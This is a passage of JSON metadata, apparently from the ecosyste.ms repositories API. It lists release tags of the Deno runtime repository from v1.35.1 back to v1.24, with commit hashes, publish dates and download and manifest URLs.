os.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.1/manifests"},{"name":"v1.35.0","sha":"1ac5fddf54a828f1372e1ff10559d1a4bc70e5c9","kind":"commit","published_at":"2023-07-04T23:58:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.35.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.35.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.35.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.0/manifests"},{"name":"v1.34.3","sha":"ef24d1a0b7fb7f3297cbda1d80df6e1f72bef252","kind":"commit","published_at":"2023-06-15T22:16:32.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.34.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.34.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.34.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.3/manifests"},{"name":"v1.34.2","sha":"acf5d44a221b84e92bd0f6b1be5e6b08fcfb5a32","kind":"commit","published_at":"2023-06-09T00:13:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.34.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.34.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.34.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.2/manifests"},{"name":"v1.34.1","sha":"ea6cd3f1fccd5a621582788a4949d40d5fcdcd1b","kind":"commit","published_at":"2023-05-29T23:30:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.34.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.34.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.34.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.1/manifests"},{"name":"v1.34.0","sha":"935071dd0e233a55c93ca4792f9210f0ea6bccc6","kind":"commit","published_at":"2023-05-24T23:38:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.34.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.34.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.34.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.0/manifests"},{"name":"v1.33.4","sha":"5be97b7584c712848336da90077db86fe4859d96","kind":"commit","published_at":"2023-05-18T16:21:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.33.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.33.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.33.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.4/manifests"},{"name":"v1.33.3","sha":"12ba2d311bb6cce7c1bf2567748987e91585d540","kind":"commit","published_at":"2023-05-12T11:06:53.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.33.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.33.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.33.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.3/manifests"},{"name":"v1.33.2","sha":"c2a61a4192609615beba363f5606e6e04ae60c97","kind":"commit","published_at":"2023-05-04T14:39:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.33.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.33.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.33.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.2/manifests"},{"name":"v1.33.1","sha":"d5f52ef7ac20cb116fad574e3017f194124be312","kind":"commit","published_at":"2023-04-28T17:05:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.33.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.33.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.33.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.1/manifests"},{"name":"v1.33.0","sha":"39ece1fe0ddacc2cbf182403c9e7085bc01df5a6","kind":"commit","published_at":"2023-04-27T23:18:57.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.33.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.33.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.33.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.0/manifests"},{"name":"v1.32.5","sha":"6cfca9b33eb0647fc73ddfc20349ae9fb943d01a","kind":"commit","published_at":"2023-04-18T18:31:30.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.5/manifests"},{"name":"v1.32.4","sha":"709cfd6d91d335c16337be9339d45250e02ae247","kind":"commit","published_at":"2023-04-12T15:17:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.4/manifests"},{"name":"v1.32.3","sha":"73d472149ce6dd360a71ca5d1819d3f8f27754f8","kind":"commit","published_at":"2023-04-01T22:51:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.3/manifests"},{"name":"v1.32.2","sha":"24e0b31096682f0ec576e0021c1925611ec4e090","kind":"commit","published_at":"2023-03-31T20:41:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.2/manifests"},{"name":"v1.32.1","sha":"99b5eaa2f4f81b0f6fb46a388808a0d8f40b91e1","kind":"commit","published_at":"2023-03-23T20:00:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.1/manifests"},{"name":"v1.32.0","sha":"d06fdf6add1b3c55fc5f4a24956f17a363d513a4","kind":"commit","published_at":"2023-03-22T23:03:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.0/manifests"},{"name":"v1.31.3","sha":"f64adbe1a3b924b9436afa39b4302c5718bbb759","kind":"commit","published_at":"2023-03-16T05:41:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.31.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.31.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.31.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.3/manifests"},{"name":"v1.31.2","sha":"fc6edac5978e7a5e44fdcee05085c7492f0ccba9","kind":"commit","published_at":"2023-03-10T06:41:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.31.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.31.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.31.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.2/manifests"},{"name":"v1.31.1","sha":"86785f21194460d713276dca212302fa1bb1c943","kind":"commit","published_at":"2023-02-25T02:17:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.31.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.31.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.31.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.1/manifests"},{"name":"v1.31.0","sha":"b6ac54815c1bcfa44a45b3f2c1c982829482477f","kind":"commit","published_at":"2023-02-24T00:20:54.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.31.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.31.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.31.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.0/manifests"},{"name":"v1.30.3","sha":"f3fb8ee18826e66d3896ea864d2bedaed6c79308","kind":"commit","published_at":"2023-02-07T01:20:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.30.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.30.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.30.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.3/manifests"},{"name":"v1.30.2","sha":"cee13304ffe58286fcfab3526c46f95a7e23825d","kind":"commit","published_at":"2023-02-03T14:46:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.30.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.30.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.30.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.2/manifests"},{"name":"v1.30.1","sha":"000fb83c587a17118d83b990f1d08c98bb9cce2a","kind":"commit","published_at":"2023-02-02T14:26:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.30.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.30.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.30.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.1/manifests"},{"name":"v1.30.0","sha":"a6f915c22f34921780b4bcb8b6da8cd3bd20d5a8","kind":"commit","published_at":"2023-01-25T23:15:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.30.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.30.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.30.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.0/manifests"},{"name":"v1.29.4","sha":"65db94feba9d4d51a09b74629f566dbc90484fba","kind":"commit","published_at":"2023-01-16T22:07:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.29.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.29.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.29.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.4/manifests"},{"name":"v1.29.3","sha":"9806dcc91496ab12c7fba238d411e23c22e2a302","kind":"commit","published_at":"2023-01-13T17:17:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.29.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.29.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.29.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.3/manifests"},{"name":"v1.29.2","sha":"14c4c8f9340235bd1ddb5388558c984beb0bb6d9","kind":"commit","published_at":"2023-01-05T13:37:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.29.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.29.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.29.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.2/manifests"},{"name":"v1.29.1","sha":"145013ab7fb00c7293ce33806f26dc4083a8da66","kind":"commit","published_at":"2022-12-15T16:32:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.29.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.29.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.29.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.1/manifests"},{"name":"v1.29.0","sha":"0d4e4af7acf82c1365999a7281910daa05f0e982","kind":"commit","published_at":"2022-12-14T23:22:54.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.29.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.29.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.29.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.0/manifests"},{"name":"v1.28.3","sha":"74064c9d8c222b33b2a552ea0af1054f57002a96","kind":"commit","published_at":"2022-12-01T10:10:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.28.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.28.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.28.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.3/manifests"},{"name":"v1.28.2","sha":"1aca16e23998ee54f6a15217cd4cc6b8b13299b7","kind":"commit","published_at":"2022-11-24T20:22:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.28.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.28.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.28.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.2/manifests"},{"name":"v1.28.1","sha":"2743d42099cb0596f03c7d1252e5cfbb53f7a9ec","kind":"commit","published_at":"2022-11-16T23:35:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.28.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.28.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.28.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.1/manifests"},{"name":"v1.28.0","sha":"916598f8a77d1fb7b7feb577e600ead2bc45045f","kind":"commit","published_at":"2022-11-13T20:31:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.28.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.28.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.28.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.0/manifests"},{"name":"v1.27.2","sha":"5cd5cfa8d655e8a71441cf9736df93efde75153c","kind":"commit","published_at":"2022-11-08T21:42:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.27.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.27.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.27.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.2/manifests"},{"name":"v1.27.1","sha":"d448c2950db2ed474405ace6a0a180301eeaa68d","kind":"commit","published_at":"2022-11-03T21:52:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.27.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.27.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.27.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.1/manifests"},{"name":"v1.27.0","sha":"b0fb8fa9dc08640e77eb0ab888a483db18a52a4b","kind":"commit","published_at":"2022-10-27T15:13:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.27.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.27.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.27.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.0/manifests"},{"name":"v1.26.2","sha":"d1f432bf12e5de645d45f1f2738a53981f39fa5b","kind":"commit","published_at":"2022-10-17T18:51:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.26.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.26.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.26.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.2/manifests"},{"name":"v1.26.1","sha":"753b60dd9b0c9bb5220609f2fe65ad06957690d6","kind":"commit","published_at":"2022-10-06T17:16:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.26.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.26.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.26.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.1/manifests"},{"name":"v1.26.0","sha":"d8827514ffef04c2e1732f7033ff6a374dd94d54","kind":"commit","published_at":"2022-09-28T22:10:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.26.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.26.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.26.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.0/manifests"},{"name":"v1.25.4","sha":"02afbe2af550ad5223d982e8fdd37f778b9d828c","kind":"commit","published_at":"2022-09-22T18:01:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.25.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.25.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.25.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.4/manifests"},{"name":"v1.25.3","sha":"f561e765a75c749f1d1e2d6584edf6018435e6e1","kind":"commit","published_at":"2022-09-15T17:46:30.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.25.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.25.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.25.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.3/manifests"},{"name":"v1.25.2","sha":"3c5af2ba495b2d5770b3f5ed12e202ba2089ebda","kind":"commit","published_at":"2022-09-09T08:54:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.25.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.25.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.25.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.2/manifests"},{"name":"v1.25.1","sha":"1e78804d5c0b8204978dd77431ac33d8d16ce5bc","kind":"commit","published_at":"2022-09-02T00:07:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.25.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.25.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.25.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.1/manifests"},{"name":"v1.25.0","sha":"8986e2ced4adbf6185aea02a580036aa92c2872c","kind":"commit","published_at":"2022-08-24T22:20:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.25.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.25.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.25.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.0/manifests"},{"name":"v1.24.3","sha":"c79127061438234a60f63cf9d0a276328961f971","kind":"commit","published_at":"2022-08-11T18:38:32.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.24.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.24.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.24.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.3/manifests"},{"name":"v1.24.2","sha":"44ade24fb213875814c431c87abb3f79ecab1fef","kind":"commit","published_at":"2022-08-04T20:49:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.24.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.24.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.24.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.2/manifests"},{"name":"v1.24.1","sha":"fa9698fe9ec3ceb660c1865eb75f07a0bc5b90c5","kind":"commit","published_at":"2022-07-28T17:22:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.24.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.24.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.24.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.1/manifests"},{"name":"v1.24.0","sha":"f0e01682cce638303e3b6997788667a0f71dff8d","kind":"commit","published_at":"2022-07-20T23:28:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.24.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.24.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.24.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.